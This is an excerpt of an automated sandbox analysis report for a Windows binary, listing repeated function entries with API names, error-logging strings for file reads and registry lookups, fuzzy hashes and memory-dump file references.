                                                                                                                  • Instruction ID: 0ba2e7c2a368dc47192e30272ed9ef75a11c50f5095c716f2e1eab9ddf7ac83d
                                                                                                                  • Opcode Fuzzy Hash: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
                                                                                                                  • Instruction Fuzzy Hash: 27F05E73B0964681FB52FF14B450BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
                                                                                                                  • Instruction ID: 4295d770f716c68aa56fcb040638fa6a4903ad00b568e54ce1404830b31cd558
                                                                                                                  • Opcode Fuzzy Hash: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
                                                                                                                  • Instruction Fuzzy Hash: 3EF05E73B0964281FB52FF14B440BBD96422F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
                                                                                                                  • Instruction ID: 4295d770f716c68aa56fcb040638fa6a4903ad00b568e54ce1404830b31cd558
                                                                                                                  • Opcode Fuzzy Hash: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
                                                                                                                  • Instruction Fuzzy Hash: 3EF05E73B0964281FB52FF14B440BBD96422F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 798608696c1efb0cf9ba72299e9e92e89b77a2b24a8315aba785b2605ef729da
                                                                                                                  • Instruction ID: cd7d381701052e1edbffe1bdf16d591c7619c7face9e15d32fba0f0dff6490c7
                                                                                                                  • Opcode Fuzzy Hash: 798608696c1efb0cf9ba72299e9e92e89b77a2b24a8315aba785b2605ef729da
                                                                                                                  • Instruction Fuzzy Hash: 67F0BE73B0814281FB53FF14B400BBC92421F41376EC906338D090B6C1AEBDA8829320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
                                                                                                                  • Instruction ID: 3b8a6eea542fb34637ba83395c3bfe2693cefb54c7e0e495c7ad69bcb0cbdf93
                                                                                                                  • Opcode Fuzzy Hash: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
                                                                                                                  • Instruction Fuzzy Hash: 1CF05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
                                                                                                                  • Instruction ID: 4f32e111606aa669f2e2081493924a6fb41a9fc20d9554670fb8ebc1df17f07d
                                                                                                                  • Opcode Fuzzy Hash: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
                                                                                                                  • Instruction Fuzzy Hash: 81F05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
                                                                                                                  • Instruction ID: 4f92e826c88e93e41a2c67fa124d3c7b9877c9c340c0a30761b7323073741610
                                                                                                                  • Opcode Fuzzy Hash: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
                                                                                                                  • Instruction Fuzzy Hash: 1EF05E73B0964281FB52FF14B441BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
                                                                                                                  • Instruction ID: 0ba2e7c2a368dc47192e30272ed9ef75a11c50f5095c716f2e1eab9ddf7ac83d
                                                                                                                  • Opcode Fuzzy Hash: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
                                                                                                                  • Instruction Fuzzy Hash: 27F05E73B0964681FB52FF14B450BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
                                                                                                                  • Instruction ID: ba8dd72a310232102464afaf126d0ceab20cf42f948dfa583aa804a504191567
                                                                                                                  • Opcode Fuzzy Hash: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
                                                                                                                  • Instruction Fuzzy Hash: 4CF0BE73B0824281FB53FF14B400BBC92421F41376EC90633CD090B6C1AEBDA8828320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
                                                                                                                  • Instruction ID: ba8dd72a310232102464afaf126d0ceab20cf42f948dfa583aa804a504191567
                                                                                                                  • Opcode Fuzzy Hash: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
                                                                                                                  • Instruction Fuzzy Hash: 4CF0BE73B0824281FB53FF14B400BBC92421F41376EC90633CD090B6C1AEBDA8828320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
                                                                                                                  • Instruction ID: ba8dd72a310232102464afaf126d0ceab20cf42f948dfa583aa804a504191567
                                                                                                                  • Opcode Fuzzy Hash: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
                                                                                                                  • Instruction Fuzzy Hash: 4CF0BE73B0824281FB53FF14B400BBC92421F41376EC90633CD090B6C1AEBDA8828320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
                                                                                                                  • Instruction ID: 3b8a6eea542fb34637ba83395c3bfe2693cefb54c7e0e495c7ad69bcb0cbdf93
                                                                                                                  • Opcode Fuzzy Hash: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
                                                                                                                  • Instruction Fuzzy Hash: 1CF05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
                                                                                                                  • Instruction ID: 4f32e111606aa669f2e2081493924a6fb41a9fc20d9554670fb8ebc1df17f07d
                                                                                                                  • Opcode Fuzzy Hash: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
                                                                                                                  • Instruction Fuzzy Hash: 81F05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
                                                                                                                  • Instruction ID: 4f92e826c88e93e41a2c67fa124d3c7b9877c9c340c0a30761b7323073741610
                                                                                                                  • Opcode Fuzzy Hash: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
                                                                                                                  • Instruction Fuzzy Hash: 1EF05E73B0964281FB52FF14B441BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
                                                                                                                  • Instruction ID: 0ba2e7c2a368dc47192e30272ed9ef75a11c50f5095c716f2e1eab9ddf7ac83d
                                                                                                                  • Opcode Fuzzy Hash: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
                                                                                                                  • Instruction Fuzzy Hash: 27F05E73B0964681FB52FF14B450BBD96421F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
                                                                                                                  • Instruction ID: 4295d770f716c68aa56fcb040638fa6a4903ad00b568e54ce1404830b31cd558
                                                                                                                  • Opcode Fuzzy Hash: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
                                                                                                                  • Instruction Fuzzy Hash: 3EF05E73B0964281FB52FF14B440BBD96422F45376EC90633CD494B6D1AEBDA8869320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 2184f698f340724257a868853157a846e45dfc9da2f3f3d0255bb2872cf3deb8
                                                                                                                  • Instruction ID: 325d748c2a04b9a70f2382249f26dbed23b2114b4811cfd46052b8d950efb7eb
                                                                                                                  • Opcode Fuzzy Hash: 2184f698f340724257a868853157a846e45dfc9da2f3f3d0255bb2872cf3deb8
                                                                                                                  • Instruction Fuzzy Hash: D6F0C2B260878641E752EF00B850BBDA254BF407B4F884237ED5D47790EFADD989D314
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: da678776d0bd37551f754dc791598b4711e195c8fdbadf124998fd8a1f822327
                                                                                                                  • Instruction ID: a1ec4a3a4010167efafa76bc38d4a63e2ae70f7c26eca77090fe353d7465682e
                                                                                                                  • Opcode Fuzzy Hash: da678776d0bd37551f754dc791598b4711e195c8fdbadf124998fd8a1f822327
                                                                                                                  • Instruction Fuzzy Hash: CEF0C2B260878642E752EF00B850BBDA654AF407B4F880237ED1D4B790EFADD989D314
                                                                                                                  APIs
